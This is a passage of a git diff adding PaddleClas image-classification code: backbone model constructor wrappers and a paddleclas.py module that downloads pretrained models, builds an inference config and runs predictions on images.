args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.DenseNet121(**kwargs) + + return model + + def densenet161(pretrained=False, **kwargs): + """ + DenseNet161 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + dropout: float=0. Probability of setting units to zero. + bn_size: int=4. The number of channals per group + Returns: + model: nn.Layer. Specific `DenseNet161` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.DenseNet161(**kwargs) + + return model + + def densenet169(pretrained=False, **kwargs): + """ + DenseNet169 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + dropout: float=0. Probability of setting units to zero. + bn_size: int=4. The number of channals per group + Returns: + model: nn.Layer. Specific `DenseNet169` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.DenseNet169(**kwargs) + + return model + + def densenet201(pretrained=False, **kwargs): + """ + DenseNet201 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + dropout: float=0. Probability of setting units to zero. + bn_size: int=4. The number of channals per group + Returns: + model: nn.Layer. Specific `DenseNet201` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.DenseNet201(**kwargs) + + return model + + def densenet264(pretrained=False, **kwargs): + """ + DenseNet264 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + dropout: float=0. Probability of setting units to zero. + bn_size: int=4. The number of channals per group + Returns: + model: nn.Layer. Specific `DenseNet264` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.DenseNet264(**kwargs) + + return model + + def inceptionv3(pretrained=False, **kwargs): + """ + InceptionV3 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `InceptionV3` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.InceptionV3(**kwargs) + + return model + + def inceptionv4(pretrained=False, **kwargs): + """ + InceptionV4 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `InceptionV4` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.InceptionV4(**kwargs) + + return model + + def googlenet(pretrained=False, **kwargs): + """ + GoogLeNet + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `GoogLeNet` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.GoogLeNet(**kwargs) + + return model + + def shufflenetv2_x0_25(pretrained=False, **kwargs): + """ + ShuffleNetV2_x0_25 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `ShuffleNetV2_x0_25` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ShuffleNetV2_x0_25(**kwargs) + + return model + + def mobilenetv1(pretrained=False, **kwargs): + """ + MobileNetV1 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV1` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV1(**kwargs) + + return model + + def mobilenetv1_x0_25(pretrained=False, **kwargs): + """ + MobileNetV1_x0_25 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV1_x0_25` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV1_x0_25(**kwargs) + + return model + + def mobilenetv1_x0_5(pretrained=False, **kwargs): + """ + MobileNetV1_x0_5 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV1_x0_5` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV1_x0_5(**kwargs) + + return model + + def mobilenetv1_x0_75(pretrained=False, **kwargs): + """ + MobileNetV1_x0_75 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV1_x0_75` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV1_x0_75(**kwargs) + + return model + + def mobilenetv2_x0_25(pretrained=False, **kwargs): + """ + MobileNetV2_x0_25 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV2_x0_25` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV2_x0_25(**kwargs) + + return model + + def mobilenetv2_x0_5(pretrained=False, **kwargs): + """ + MobileNetV2_x0_5 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV2_x0_5` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV2_x0_5(**kwargs) + + return model + + def mobilenetv2_x0_75(pretrained=False, **kwargs): + """ + MobileNetV2_x0_75 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV2_x0_75` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV2_x0_75(**kwargs) + + return model + + def mobilenetv2_x1_5(pretrained=False, **kwargs): + """ + MobileNetV2_x1_5 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV2_x1_5` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV2_x1_5(**kwargs) + + return model + + def mobilenetv2_x2_0(pretrained=False, **kwargs): + """ + MobileNetV2_x2_0 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV2_x2_0` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV2_x2_0(**kwargs) + + return model + + def mobilenetv3_large_x0_35(pretrained=False, **kwargs): + """ + MobileNetV3_large_x0_35 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x0_35` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_large_x0_35(**kwargs) + + return model + + def mobilenetv3_large_x0_5(pretrained=False, **kwargs): + """ + MobileNetV3_large_x0_5 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x0_5` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_large_x0_5(**kwargs) + + return model + + def mobilenetv3_large_x0_75(pretrained=False, **kwargs): + """ + MobileNetV3_large_x0_75 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x0_75` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_large_x0_75(**kwargs) + + return model + + def mobilenetv3_large_x1_0(pretrained=False, **kwargs): + """ + MobileNetV3_large_x1_0 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x1_0` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_large_x1_0(**kwargs) + + return model + + def mobilenetv3_large_x1_25(pretrained=False, **kwargs): + """ + MobileNetV3_large_x1_25 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x1_25` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_large_x1_25(**kwargs) + + return model + + def mobilenetv3_small_x0_35(pretrained=False, **kwargs): + """ + MobileNetV3_small_x0_35 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x0_35` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_small_x0_35(**kwargs) + + return model + + def mobilenetv3_small_x0_5(pretrained=False, **kwargs): + """ + MobileNetV3_small_x0_5 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x0_5` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_small_x0_5(**kwargs) + + return model + + def mobilenetv3_small_x0_75(pretrained=False, **kwargs): + """ + MobileNetV3_small_x0_75 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x0_75` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_small_x0_75(**kwargs) + + return model + + def mobilenetv3_small_x1_0(pretrained=False, **kwargs): + """ + MobileNetV3_small_x1_0 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x1_0` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_small_x1_0(**kwargs) + + return model + + def mobilenetv3_small_x1_25(pretrained=False, **kwargs): + """ + MobileNetV3_small_x1_25 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x1_25` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_small_x1_25(**kwargs) + + return model + + def resnext101_32x4d(pretrained=False, **kwargs): + """ + ResNeXt101_32x4d + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `ResNeXt101_32x4d` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNeXt101_32x4d(**kwargs) + + return model + + def resnext101_64x4d(pretrained=False, **kwargs): + """ + ResNeXt101_64x4d + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `ResNeXt101_64x4d` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNeXt101_64x4d(**kwargs) + + return model + + def resnext152_32x4d(pretrained=False, **kwargs): + """ + ResNeXt152_32x4d + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `ResNeXt152_32x4d` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNeXt152_32x4d(**kwargs) + + return model + + def resnext152_64x4d(pretrained=False, **kwargs): + """ + ResNeXt152_64x4d + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `ResNeXt152_64x4d` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNeXt152_64x4d(**kwargs) + + return model + + def resnext50_32x4d(pretrained=False, **kwargs): + """ + ResNeXt50_32x4d + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `ResNeXt50_32x4d` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNeXt50_32x4d(**kwargs) + + return model + + def resnext50_64x4d(pretrained=False, **kwargs): + """ + ResNeXt50_64x4d + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `ResNeXt50_64x4d` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNeXt50_64x4d(**kwargs) + + return model + + def darknet53(pretrained=False, **kwargs): + """ + DarkNet53 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `ResNeXt50_64x4d` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.DarkNet53(**kwargs) + + return model diff --git a/Smart_container/PaddleClas/paddleclas.py b/Smart_container/PaddleClas/paddleclas.py new file mode 100644 index 0000000..91cd030 --- /dev/null +++ b/Smart_container/PaddleClas/paddleclas.py @@ -0,0 +1,552 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os +import sys +__dir__ = os.path.dirname(__file__) +sys.path.append(os.path.join(__dir__, "")) +sys.path.append(os.path.join(__dir__, "deploy")) + +from typing import Union, Generator +import argparse +import shutil +import textwrap +import tarfile +import requests +import warnings +from functools import partial +from difflib import SequenceMatcher + +import cv2 +import numpy as np +from tqdm import tqdm +from prettytable import PrettyTable + +from deploy.python.predict_cls import ClsPredictor +from deploy.utils.get_image_list import get_image_list +from deploy.utils import config + +from ppcls.arch.backbone import * + +__all__ = ["PaddleClas"] + +BASE_DIR = os.path.expanduser("~/.paddleclas/") +BASE_INFERENCE_MODEL_DIR = os.path.join(BASE_DIR, "inference_model") +BASE_IMAGES_DIR = os.path.join(BASE_DIR, "images") +BASE_DOWNLOAD_URL = "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/inference/{}_infer.tar" +MODEL_SERIES = { + "AlexNet": ["AlexNet"], + "DarkNet": ["DarkNet53"], + "DeiT": [ + "DeiT_base_distilled_patch16_224", "DeiT_base_distilled_patch16_384", + "DeiT_base_patch16_224", "DeiT_base_patch16_384", + "DeiT_small_distilled_patch16_224", "DeiT_small_patch16_224", + "DeiT_tiny_distilled_patch16_224", "DeiT_tiny_patch16_224" + ], + "DenseNet": [ + "DenseNet121", "DenseNet161", "DenseNet169", "DenseNet201", + "DenseNet264" + ], + "DPN": ["DPN68", "DPN92", "DPN98", "DPN107", "DPN131"], + "EfficientNet": [ + "EfficientNetB0", "EfficientNetB0_small", "EfficientNetB1", + "EfficientNetB2", "EfficientNetB3", "EfficientNetB4", "EfficientNetB5", + "EfficientNetB6", "EfficientNetB7" + ], + "GhostNet": + ["GhostNet_x0_5", "GhostNet_x1_0", "GhostNet_x1_3", "GhostNet_x1_3_ssld"], + "HRNet": [ + "HRNet_W18_C", "HRNet_W30_C", "HRNet_W32_C", "HRNet_W40_C", + "HRNet_W44_C", "HRNet_W48_C", "HRNet_W64_C", "HRNet_W18_C_ssld", + "HRNet_W48_C_ssld" + ], + "Inception": ["GoogLeNet", "InceptionV3", "InceptionV4"], + "MobileNetV1": [ + "MobileNetV1_x0_25", "MobileNetV1_x0_5", "MobileNetV1_x0_75", + "MobileNetV1", "MobileNetV1_ssld" + ], + "MobileNetV2": [ + "MobileNetV2_x0_25", "MobileNetV2_x0_5", "MobileNetV2_x0_75", + "MobileNetV2", "MobileNetV2_x1_5", "MobileNetV2_x2_0", + "MobileNetV2_ssld" + ], + "MobileNetV3": [ + "MobileNetV3_small_x0_35", "MobileNetV3_small_x0_5", + "MobileNetV3_small_x0_75", "MobileNetV3_small_x1_0", + "MobileNetV3_small_x1_25", "MobileNetV3_large_x0_35", + "MobileNetV3_large_x0_5", "MobileNetV3_large_x0_75", + "MobileNetV3_large_x1_0", "MobileNetV3_large_x1_25", + "MobileNetV3_small_x1_0_ssld", "MobileNetV3_large_x1_0_ssld" + ], + "RegNet": ["RegNetX_4GF"], + "Res2Net": [ + "Res2Net50_14w_8s", "Res2Net50_26w_4s", "Res2Net50_vd_26w_4s", + "Res2Net200_vd_26w_4s", "Res2Net101_vd_26w_4s", + "Res2Net50_vd_26w_4s_ssld", "Res2Net101_vd_26w_4s_ssld", + "Res2Net200_vd_26w_4s_ssld" + ], + "ResNeSt": ["ResNeSt50", "ResNeSt50_fast_1s1x64d"], + "ResNet": [ + "ResNet18", "ResNet18_vd", "ResNet34", "ResNet34_vd", "ResNet50", + "ResNet50_vc", "ResNet50_vd", "ResNet50_vd_v2", "ResNet101", + "ResNet101_vd", "ResNet152", "ResNet152_vd", "ResNet200_vd", + "ResNet34_vd_ssld", "ResNet50_vd_ssld", "ResNet50_vd_ssld_v2", + "ResNet101_vd_ssld", "Fix_ResNet50_vd_ssld_v2", "ResNet50_ACNet_deploy" + ], + "ResNeXt": [ + "ResNeXt50_32x4d", "ResNeXt50_vd_32x4d", "ResNeXt50_64x4d", + "ResNeXt50_vd_64x4d", "ResNeXt101_32x4d", "ResNeXt101_vd_32x4d", + "ResNeXt101_32x8d_wsl", "ResNeXt101_32x16d_wsl", + "ResNeXt101_32x32d_wsl", "ResNeXt101_32x48d_wsl", + "Fix_ResNeXt101_32x48d_wsl", "ResNeXt101_64x4d", "ResNeXt101_vd_64x4d", + "ResNeXt152_32x4d", "ResNeXt152_vd_32x4d", "ResNeXt152_64x4d", + "ResNeXt152_vd_64x4d" + ], + "SENet": [ + "SENet154_vd", "SE_HRNet_W64_C_ssld", "SE_ResNet18_vd", + "SE_ResNet34_vd", "SE_ResNet50_vd", "SE_ResNeXt50_32x4d", + "SE_ResNeXt50_vd_32x4d", "SE_ResNeXt101_32x4d" + ], + "ShuffleNetV2": [ + "ShuffleNetV2_swish", "ShuffleNetV2_x0_25", "ShuffleNetV2_x0_33", + "ShuffleNetV2_x0_5", "ShuffleNetV2_x1_0", "ShuffleNetV2_x1_5", + "ShuffleNetV2_x2_0" + ], + "SqueezeNet": ["SqueezeNet1_0", "SqueezeNet1_1"], + "SwinTransformer": [ + "SwinTransformer_large_patch4_window7_224_22kto1k", + "SwinTransformer_large_patch4_window12_384_22kto1k", + "SwinTransformer_base_patch4_window7_224_22kto1k", + "SwinTransformer_base_patch4_window12_384_22kto1k", + "SwinTransformer_base_patch4_window12_384", + "SwinTransformer_base_patch4_window7_224", + "SwinTransformer_small_patch4_window7_224", + "SwinTransformer_tiny_patch4_window7_224" + ], + "VGG": ["VGG11", "VGG13", "VGG16", "VGG19"], + "VisionTransformer": [ + "ViT_base_patch16_224", "ViT_base_patch16_384", "ViT_base_patch32_384", + "ViT_large_patch16_224", "ViT_large_patch16_384", + "ViT_large_patch32_384", "ViT_small_patch16_224" + ], + "Xception": [ + "Xception41", "Xception41_deeplab", "Xception65", "Xception65_deeplab", + "Xception71" + ] +} + + +class ImageTypeError(Exception): + """ImageTypeError. + """ + + def __init__(self, message=""): + super().__init__(message) + + +class InputModelError(Exception): + """InputModelError. + """ + + def __init__(self, message=""): + super().__init__(message) + + +def init_config(model_name, + inference_model_dir, + use_gpu=True, + batch_size=1, + topk=5, + **kwargs): + imagenet1k_map_path = os.path.join( + os.path.abspath(__dir__), "ppcls/utils/imagenet1k_label_list.txt") + cfg = { + "Global": { + "infer_imgs": kwargs["infer_imgs"] + if "infer_imgs" in kwargs else False, + "model_name": model_name, + "inference_model_dir": inference_model_dir, + "batch_size": batch_size, + "use_gpu": use_gpu, + "enable_mkldnn": kwargs["enable_mkldnn"] + if "enable_mkldnn" in kwargs else False, + "cpu_num_threads": kwargs["cpu_num_threads"] + if "cpu_num_threads" in kwargs else 1, + "enable_benchmark": False, + "use_fp16": kwargs["use_fp16"] if "use_fp16" in kwargs else False, + "ir_optim": True, + "use_tensorrt": kwargs["use_tensorrt"] + if "use_tensorrt" in kwargs else False, + "gpu_mem": kwargs["gpu_mem"] if "gpu_mem" in kwargs else 8000, + "enable_profile": False + }, + "PreProcess": { + "transform_ops": [{ + "ResizeImage": { + "resize_short": kwargs["resize_short"] + if "resize_short" in kwargs else 256 + } + }, { + "CropImage": { + "size": kwargs["crop_size"] + if "crop_size" in kwargs else 224 + } + }, { + "NormalizeImage": { + "scale": 0.00392157, + "mean": [0.485, 0.456, 0.406], + "std": [0.229, 0.224, 0.225], + "order": '' + } + }, { + "ToCHWImage": None + }] + }, + "PostProcess": { + "main_indicator": "Topk", + "Topk": { + "topk": topk, + "class_id_map_file": imagenet1k_map_path + } + } + } + if "save_dir" in kwargs: + if kwargs["save_dir"] is not None: + cfg["PostProcess"]["SavePreLabel"] = { + "save_dir": kwargs["save_dir"] + } + if "class_id_map_file" in kwargs: + if kwargs["class_id_map_file"] is not None: + cfg["PostProcess"]["Topk"]["class_id_map_file"] = kwargs[ + "class_id_map_file"] + + cfg = config.AttrDict(cfg) + config.create_attr_dict(cfg) + return cfg + + +def args_cfg(): + def str2bool(v): + return v.lower() in ("true", "t", "1") + + parser = argparse.ArgumentParser() + parser.add_argument( + "--infer_imgs", + type=str, + required=True, + help="The image(s) to be predicted.") + parser.add_argument( + "--model_name", type=str, help="The model name to be used.") + parser.add_argument( + "--inference_model_dir", + type=str, + help="The directory of model files. Valid when model_name not specifed." + ) + parser.add_argument( + "--use_gpu", type=str, default=True, help="Whether use GPU.") + parser.add_argument("--gpu_mem", type=int, default=8000, help="") + parser.add_argument( + "--enable_mkldnn", + type=str2bool, + default=False, + help="Whether use MKLDNN. Valid when use_gpu is False") + parser.add_argument("--cpu_num_threads", type=int, default=1, help="") + parser.add_argument( + "--use_tensorrt", type=str2bool, default=False, help="") + parser.add_argument("--use_fp16", type=str2bool, default=False, help="") + parser.add_argument( + "--batch_size", type=int, default=1, help="Batch size. Default by 1.") + parser.add_argument( + "--topk", + type=int, + default=5, + help="Return topk score(s) and corresponding results. Default by 5.") + parser.add_argument( + "--class_id_map_file", + type=str, + help="The path of file that map class_id and label.") + parser.add_argument( + "--save_dir", + type=str, + help="The directory to save prediction results as pre-label.") + parser.add_argument( + "--resize_short", + type=int, + default=256, + help="Resize according to short size.") + parser.add_argument( + "--crop_size", type=int, default=224, help="Centor crop size.") + + args = parser.parse_args() + return vars(args) + + +def print_info(): + """Print list of supported models in formatted. + """ + table = PrettyTable(["Series", "Name"]) + try: + sz = os.get_terminal_size() + width = sz.columns - 30 if sz.columns > 50 else 10 + except OSError: + width = 100 + for series in MODEL_SERIES: + names = textwrap.fill(" ".join(MODEL_SERIES[series]), width=width) + table.add_row([series, names]) + width = len(str(table).split("\n")[0]) + print("{}".format("-" * width)) + print("Models supported by PaddleClas".center(width)) + print(table) + print("Powered by PaddlePaddle!".rjust(width)) + print("{}".format("-" * width)) + + +def get_model_names(): + """Get the model names list. + """ + model_names = [] + for series in MODEL_SERIES: + model_names += (MODEL_SERIES[series]) + return model_names + + +def similar_architectures(name="", names=[], thresh=0.1, topk=10): + """Find the most similar topk model names. + """ + scores = [] + for idx, n in enumerate(names): + if n.startswith("__"): + continue + score = SequenceMatcher(None, n.lower(), name.lower()).quick_ratio() + if score > thresh: + scores.append((idx, score)) + scores.sort(key=lambda x: x[1], reverse=True) + similar_names = [names[s[0]] for s in scores[:min(topk, len(scores))]] + return similar_names + + +def download_with_progressbar(url, save_path): + """Download from url with progressbar. + """ + if os.path.isfile(save_path): + os.remove(save_path) + response = requests.get(url, stream=True) + total_size_in_bytes = int(response.headers.get("content-length", 0)) + block_size = 1024 # 1 Kibibyte + progress_bar = tqdm(total=total_size_in_bytes, unit="iB", unit_scale=True) + with open(save_path, "wb") as file: + for data in response.iter_content(block_size): + progress_bar.update(len(data)) + file.write(data) + progress_bar.close() + if total_size_in_bytes == 0 or progress_bar.n != total_size_in_bytes or not os.path.isfile( + save_path): + raise Exception( + f"Something went wrong while downloading file from {url}") + + +def check_model_file(model_name): + """Check the model files exist and download and untar when no exist. + """ + storage_directory = partial(os.path.join, BASE_INFERENCE_MODEL_DIR, + model_name) + url = BASE_DOWNLOAD_URL.format(model_name) + + tar_file_name_list = [ + "inference.pdiparams", "inference.pdiparams.info", "inference.pdmodel" + ] + model_file_path = storage_directory("inference.pdmodel") + params_file_path = storage_directory("inference.pdiparams") + if not os.path.exists(model_file_path) or not os.path.exists( + params_file_path): + tmp_path = storage_directory(url.split("/")[-1]) + print(f"download {url} to {tmp_path}") + os.makedirs(storage_directory(), exist_ok=True) + download_with_progressbar(url, tmp_path) + with tarfile.open(tmp_path, "r") as tarObj: + for member in tarObj.getmembers(): + filename = None + for tar_file_name in tar_file_name_list: + if tar_file_name in member.name: + filename = tar_file_name + if filename is None: + continue + file = tarObj.extractfile(member) + with open(storage_directory(filename), "wb") as f: + f.write(file.read()) + os.remove(tmp_path) + if not os.path.exists(model_file_path) or not os.path.exists( + params_file_path): + raise Exception( + f"Something went wrong while praparing the model[{model_name}] files!" + ) + + return storage_directory() + + +class PaddleClas(object): + """PaddleClas. + """ + + print_info() + + def __init__(self, + model_name: str=None, + inference_model_dir: str=None, + use_gpu: bool=True, + batch_size: int=1, + topk: int=5, + **kwargs): + """Init PaddleClas with config. + + Args: + model_name (str, optional): The model name supported by PaddleClas. If specified, override config. Defaults to None. + inference_model_dir (str, optional): The directory that contained model file and params file to be used. If specified, override config. Defaults to None. + use_gpu (bool, optional): Whether use GPU. If specified, override config. Defaults to True. + batch_size (int, optional): The batch size to pridict. If specified, override config. Defaults to 1. + topk (int, optional): Return the top k prediction results with the highest score. Defaults to 5. + """ + super().__init__() + self._config = init_config(model_name, inference_model_dir, use_gpu, + batch_size, topk, **kwargs) + self._check_input_model() + self.cls_predictor = ClsPredictor(self._config) + + def get_config(self): + """Get the config. + """ + return self._config + + def _check_input_model(self): + """Check input model name or model files. + """ + candidate_model_names = get_model_names() + input_model_name = self._config.Global.get("model_name", None) + inference_model_dir = self._config.Global.get("inference_model_dir", + None) + if input_model_name is not None: + similar_names = similar_architectures(input_model_name, + candidate_model_names) + similar_names_str = ", ".join(similar_names) + if input_model_name not in candidate_model_names: + err = f"{input_model_name} is not provided by PaddleClas. \nMaybe you want: [{similar_names_str}]. \nIf you want to use your own model, please specify inference_model_dir!" + raise InputModelError(err) + self._config.Global.inference_model_dir = check_model_file( + input_model_name) + return + elif inference_model_dir is not None: + model_file_path = os.path.join(inference_model_dir, + "inference.pdmodel") + params_file_path = os.path.join(inference_model_dir, + "inference.pdiparams") + if not os.path.isfile(model_file_path) or not os.path.isfile( + params_file_path): + err = f"There is no model file or params file in this directory: {inference_model_dir}" + raise InputModelError(err) + return + else: + err = f"Please specify the model name supported by PaddleClas or directory contained model files(inference.pdmodel, inference.pdiparams)." + raise InputModelError(err) + return + + def predict(self, input_data: Union[str, np.array], + print_pred: bool=False) -> Generator[list, None, None]: + """Predict input_data. + + Args: + input_data (Union[str, np.array]): + When the type is str, it is the path of image, or the directory containing images, or the URL of image from Internet. + When the type is np.array, it is the image data whose channel order is RGB. + print_pred (bool, optional): Whether print the prediction result. Defaults to False. Defaults to False. + + Raises: + ImageTypeError: Illegal input_data. + + Yields: + Generator[list, None, None]: + The prediction result(s) of input_data by batch_size. For every one image, + prediction result(s) is zipped as a dict, that includs topk "class_ids", "scores" and "label_names". + The format is as follow: [{"class_ids": [...], "scores": [...], "label_names": [...]}, ...] + """ + + if isinstance(input_data, np.ndarray): + outputs = self.cls_predictor.predict(input_data) + yield self.cls_predictor.postprocess(outputs) + elif isinstance(input_data, str): + if input_data.startswith("http") or input_data.startswith("https"): + image_storage_dir = partial(os.path.join, BASE_IMAGES_DIR) + if not os.path.exists(image_storage_dir()): + os.makedirs(image_storage_dir()) + image_save_path = image_storage_dir("tmp.jpg") + download_with_progressbar(input_data, image_save_path) + input_data = image_save_path + warnings.warn( + f"Image to be predicted from Internet: {input_data}, has been saved to: {image_save_path}" + ) + image_list = get_image_list(input_data) + + batch_size = self._config.Global.get("batch_size", 1) + topk = self._config.PostProcess.get('topk', 1) + + img_list = [] + img_path_list = [] + cnt = 0 + for idx, img_path in enumerate(image_list): + img = cv2.imread(img_path) + if img is None: + warnings.warn( + f"Image file failed to read and has been skipped. The path: {img_path}" + ) + continue + img = img[:, :, ::-1] + img_list.append(img) + img_path_list.append(img_path) + cnt += 1 + + if cnt % batch_size == 0 or (idx + 1) == len(image_list): + outputs = self.cls_predictor.predict(img_list) + preds = self.cls_predictor.postprocess(outputs, + img_path_list) + if print_pred and preds: + for pred in preds: + filename = pred.pop("file_name") + pred_str = ", ".join( + [f"{k}: {pred[k]}" for k in pred]) 